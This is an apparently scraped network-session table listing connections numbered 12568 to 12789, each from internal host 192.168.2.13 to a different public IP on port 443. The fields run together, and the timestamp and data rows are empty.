                                    12568192.168.2.1357042179.248.190.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12569192.168.2.133633495.143.98.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12570192.168.2.1347160113.75.63.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12571192.168.2.133429462.148.133.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12572192.168.2.135494237.61.169.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12573192.168.2.135077095.29.223.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12574192.168.2.134690453.116.255.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12575192.168.2.1349414205.198.73.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12576192.168.2.1344552167.173.220.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12577192.168.2.1340242102.212.191.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12578192.168.2.1334246119.33.35.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12579192.168.2.1341266210.35.116.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12580192.168.2.1337070111.213.7.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12581192.168.2.1352608191.34.228.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12582192.168.2.1354030195.239.235.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12583192.168.2.1357176132.206.223.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12584192.168.2.134337651.151.70.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12585192.168.2.134365664.21.168.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12586192.168.2.1352772198.26.243.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12587192.168.2.1358332160.137.46.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12588192.168.2.1332926135.174.114.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12589192.168.2.1356750206.172.16.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12590192.168.2.1343626150.129.151.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12591192.168.2.1345490131.236.147.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12592192.168.2.1355870103.57.105.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12593192.168.2.1355650142.164.143.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12594192.168.2.1351344106.120.40.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12595192.168.2.1358306150.27.171.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12596192.168.2.1349160167.11.121.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12597192.168.2.133938040.220.46.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12598192.168.2.1356080105.88.72.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12599192.168.2.1333558170.37.1.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12600192.168.2.135068492.58.96.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12601192.168.2.135506479.113.158.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12602192.168.2.1334718208.134.107.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12603192.168.2.1338990137.247.87.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12604192.168.2.1334652154.129.156.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12605192.168.2.1341144134.1.205.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12606192.168.2.133975032.112.89.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12607192.168.2.1341934158.224.153.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12608192.168.2.1346388223.164.246.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12609192.168.2.1343698157.236.220.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12610192.168.2.1357416218.38.22.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12611192.168.2.133551219.88.217.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12612192.168.2.1334472147.56.215.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12613192.168.2.134548073.195.81.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12614192.168.2.1351390108.128.176.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12615192.168.2.133655889.180.142.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12616192.168.2.133507017.149.141.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12617192.168.2.135976434.243.148.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12618192.168.2.1347740144.118.69.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12619192.168.2.1347702101.188.3.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12620192.168.2.1353462103.235.238.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12621192.168.2.1341908151.25.195.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12622192.168.2.1346524163.255.63.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12623192.168.2.1343334128.102.170.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12624192.168.2.134110693.233.178.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12625192.168.2.134104818.134.41.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12626192.168.2.1359552104.32.55.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12627192.168.2.1359678171.161.247.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12628192.168.2.135261425.63.38.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12629192.168.2.133431086.159.197.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12630192.168.2.1333392111.176.210.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12631192.168.2.1354140116.2.91.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12632192.168.2.1345818208.145.204.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12633192.168.2.134355699.157.44.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12634192.168.2.1345440136.212.92.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12635192.168.2.1332898178.213.172.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12636192.168.2.1341136172.95.224.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12637192.168.2.1333270138.155.140.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12638192.168.2.1354774223.223.155.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12639192.168.2.133802499.173.158.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12640192.168.2.1345220177.98.221.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12641192.168.2.1341230198.240.238.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12642192.168.2.1347364193.195.111.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12643192.168.2.133842671.13.251.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12644192.168.2.1359180183.219.115.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12645192.168.2.134915090.223.87.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12646192.168.2.135042299.105.137.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12647192.168.2.1347098179.24.193.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12648192.168.2.134229683.145.13.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12649192.168.2.135067245.194.8.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12650192.168.2.1347486147.138.225.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12651192.168.2.133441434.99.150.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12652192.168.2.1354728171.182.110.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12653192.168.2.135940895.150.107.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12654192.168.2.1340860213.94.235.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12655192.168.2.1351608157.233.138.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12656192.168.2.1359464201.157.198.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12657192.168.2.1335100186.216.122.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12658192.168.2.136003097.22.82.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12659192.168.2.136029251.252.99.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12660192.168.2.134421851.174.103.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12661192.168.2.1336858199.214.177.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12662192.168.2.133850858.123.106.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12663192.168.2.1339114124.148.177.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12664192.168.2.135013659.124.73.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12665192.168.2.1359074190.178.183.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12666192.168.2.1348544220.92.242.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12667192.168.2.135572692.99.120.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12668192.168.2.1347140113.88.150.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12669192.168.2.1347272144.128.138.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12670192.168.2.13492724.76.170.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12671192.168.2.133485669.29.29.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12672192.168.2.1340858185.20.146.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12673192.168.2.1332802200.184.13.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12674192.168.2.133560470.66.84.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12675192.168.2.1336836159.98.168.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12676192.168.2.1341306108.51.60.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12677192.168.2.1345722124.90.173.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12678192.168.2.1335932125.60.242.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12679192.168.2.1350608103.32.10.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12680192.168.2.133779081.21.240.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12681192.168.2.1348440201.97.4.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12682192.168.2.135342647.144.97.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12683192.168.2.1339944218.245.195.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12684192.168.2.1354332156.234.246.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12685192.168.2.134265478.138.124.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12686192.168.2.1338016124.56.206.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12687192.168.2.133726413.119.234.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12688192.168.2.134614877.240.101.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12689192.168.2.135456289.30.11.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12690192.168.2.1332936163.165.79.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12691192.168.2.135266896.168.6.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12692192.168.2.134818038.20.102.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12693192.168.2.1355878173.226.61.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12694192.168.2.1339594159.77.162.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12695192.168.2.133789818.15.200.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12696192.168.2.1358000113.22.196.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12697192.168.2.1354142177.123.137.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12698192.168.2.136011898.200.250.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12699192.168.2.1339558185.31.83.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12700192.168.2.135213490.251.249.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12701192.168.2.133606441.101.162.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12702192.168.2.1350344109.197.241.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12703192.168.2.136098276.228.59.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12704192.168.2.1355534195.133.12.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12705192.168.2.1351546220.252.226.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12706192.168.2.133849049.69.154.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12707192.168.2.1353010198.229.23.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12708192.168.2.135195045.148.237.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12709192.168.2.134717412.58.189.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12710192.168.2.1350904182.228.198.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12711192.168.2.1337172148.66.67.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12712192.168.2.1357960128.198.126.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12713192.168.2.1333586118.6.250.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12714192.168.2.133924660.33.163.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12715192.168.2.1355662196.50.154.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12716192.168.2.1336936153.100.249.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12717192.168.2.1342392159.243.188.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12718192.168.2.1355904146.214.194.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12719192.168.2.133398050.161.8.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12720192.168.2.135054491.235.36.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12721192.168.2.134771451.227.203.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12722192.168.2.13354149.113.90.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12723192.168.2.134936467.93.92.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12724192.168.2.135682660.102.132.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12725192.168.2.1350070131.21.19.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12726192.168.2.133323213.28.41.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12727192.168.2.135687044.29.85.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12728192.168.2.1355250150.95.188.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12729192.168.2.1340466218.47.192.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12730192.168.2.133496465.24.155.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12731192.168.2.1340660148.156.116.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12732192.168.2.1355974184.241.136.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12733192.168.2.1356668197.181.45.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12734192.168.2.1342476219.143.28.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12735192.168.2.1349716208.117.146.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12736192.168.2.134667664.81.3.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12737192.168.2.1356424107.133.141.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12738192.168.2.133811869.241.76.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12739192.168.2.13517242.187.46.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12740192.168.2.133881463.196.17.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12741192.168.2.1346060122.235.73.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12742192.168.2.1347874182.89.76.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12743192.168.2.1348984121.1.144.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12744192.168.2.135133669.59.188.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12745192.168.2.134258693.26.111.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12746192.168.2.133668457.177.59.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12747192.168.2.134537814.177.165.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12748192.168.2.1358540219.43.181.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12749192.168.2.1359468171.68.73.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12750192.168.2.1339422126.50.192.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12751192.168.2.1351756136.59.208.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12752192.168.2.1348562157.231.56.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12753192.168.2.135566253.171.136.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12754192.168.2.134682479.255.87.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12755192.168.2.13461684.104.184.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12756192.168.2.1335038142.107.99.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12757192.168.2.134492619.158.123.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12758192.168.2.136009039.94.166.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12759192.168.2.1345764119.107.149.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12760192.168.2.133612625.52.86.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12761192.168.2.134652698.172.177.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12762192.168.2.135766862.23.248.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12763192.168.2.135094050.115.193.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12764192.168.2.134150837.100.189.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12765192.168.2.1334458113.170.245.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12766192.168.2.1359620163.71.215.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12767192.168.2.1347770173.160.83.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12768192.168.2.134107242.115.125.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12769192.168.2.1354126163.13.54.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12770192.168.2.135562898.3.232.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12771192.168.2.136074292.30.218.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12772192.168.2.134419419.137.22.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12773192.168.2.133681271.16.170.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12774192.168.2.135662692.147.10.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12775192.168.2.1351386152.42.69.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12776192.168.2.134266089.24.118.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12777192.168.2.135753492.216.115.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12778192.168.2.1359742174.194.99.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12779192.168.2.1357828101.181.122.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12780192.168.2.1337324161.205.138.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12781192.168.2.133495662.24.209.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12782192.168.2.1354530207.32.116.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12783192.168.2.13515009.160.219.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12784192.168.2.1342128154.148.245.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12785192.168.2.1344242118.109.25.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12786192.168.2.1345878204.55.135.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12787192.168.2.1334616101.136.41.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12788192.168.2.1348892161.200.208.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12789192.168.2.1360356137.236.141.139443
                                    TimestampBytes transferredDirectionData


